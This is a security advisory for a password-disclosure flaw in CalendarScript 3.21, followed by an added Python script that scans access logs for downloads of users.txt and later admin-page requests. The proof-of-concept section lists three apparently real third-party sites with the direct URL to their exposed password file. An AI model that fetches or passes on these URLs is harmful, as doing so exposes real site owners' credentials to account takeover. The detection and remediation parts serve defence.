CalendarScript version 3.2.1 suffers from a remote password disclosure vulnerability. Note that this finding houses site-specific data.
[+] Password Disclosure on CalendarScript 3.21
[+] Date: 28/04/2014
[+] Risk: High
[+] Author: Felipe Andrian Peixoto
[+] Vendor Homepage: http://www.calendarscript.com/
[+] Contact: felipe_andrian@hotmail.com
[+] Tested on: Windows 7 and Linux
[+] Vulnerable File: users.txt
[+] Version: 3.21
[+] Exploit: http://host/calendar/calendarscript/users.txt
[+] PoC: http://www.kcreggae.org/Calendar/calendarscript/users.txt
http://fangmichael.com/cgi-bin/calendar/calendarscript/users.txt
http://www.theoldironsides.com/calendar/calendarscript/users.txt
[+] Admin page: http://host/calendar/calendar_admin.pl
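
Added detection example, not part of the original advisory or of CalendarScript: it scans your own web server access log for successful downloads of calendarscript/users.txt and for later requests to calendar_admin.pl from the same client. The combined log format, the function name audit_log and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Assumption: Apache/nginx "combined" access-log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
# Paths taken from the advisory's "Exploit" and "Admin page" fields.
DATA_FILE = re.compile(r'/calendarscript/users\.txt$', re.I)
ADMIN_PAGE = re.compile(r'/calendar_admin\.pl$', re.I)


def audit_log(lines):
    """Return {client_ip: {"disclosed": [timestamps], "admin_after": [timestamps]}}.

    "disclosed"   - users.txt was actually served (HTTP 200/206).
    "admin_after" - the same client then requested the admin page.
    """
    findings = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        # Drop the query string and decode %xx so users%2Etxt is still caught.
        path = unquote(m["path"].split("?", 1)[0])
        ip = m["ip"]
        if DATA_FILE.search(path) and m["status"] in ("200", "206"):
            entry = findings.setdefault(ip, {"disclosed": [], "admin_after": []})
            entry["disclosed"].append(m["ts"])
        elif ADMIN_PAGE.search(path) and ip in findings:
            findings[ip]["admin_after"].append(m["ts"])
    return findings


# Constructed sample lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [28/Apr/2014:10:00:01 +0000] "GET /calendar/calendarscript/users.txt HTTP/1.1" 200 312 "-" "-"',
    '192.0.2.10 - - [28/Apr/2014:10:00:09 +0000] "POST /calendar/calendar_admin.pl HTTP/1.1" 200 5120 "-" "-"',
    '198.51.100.7 - - [28/Apr/2014:10:02:00 +0000] "GET /calendar/calendarscript/users%2Etxt HTTP/1.1" 403 199 "-" "-"',
    '198.51.100.7 - - [28/Apr/2014:10:02:05 +0000] "GET /calendar/calendar_admin.pl HTTP/1.1" 200 2048 "-" "-"',
    '203.0.113.5 - - [28/Apr/2014:10:03:00 +0000] "GET /calendar/calendar.pl HTTP/1.1" 200 900 "-" "-"',
]

if __name__ == "__main__":
    for ip, hit in audit_log(SAMPLE_LOG).items():
        print(ip, "users.txt served at", hit["disclosed"],
              "| admin page requested afterwards at", hit["admin_after"])
```

Any entry under "disclosed" means the server is handing out the data file: deny web access to it or move it outside the document root, and change the passwords it contained.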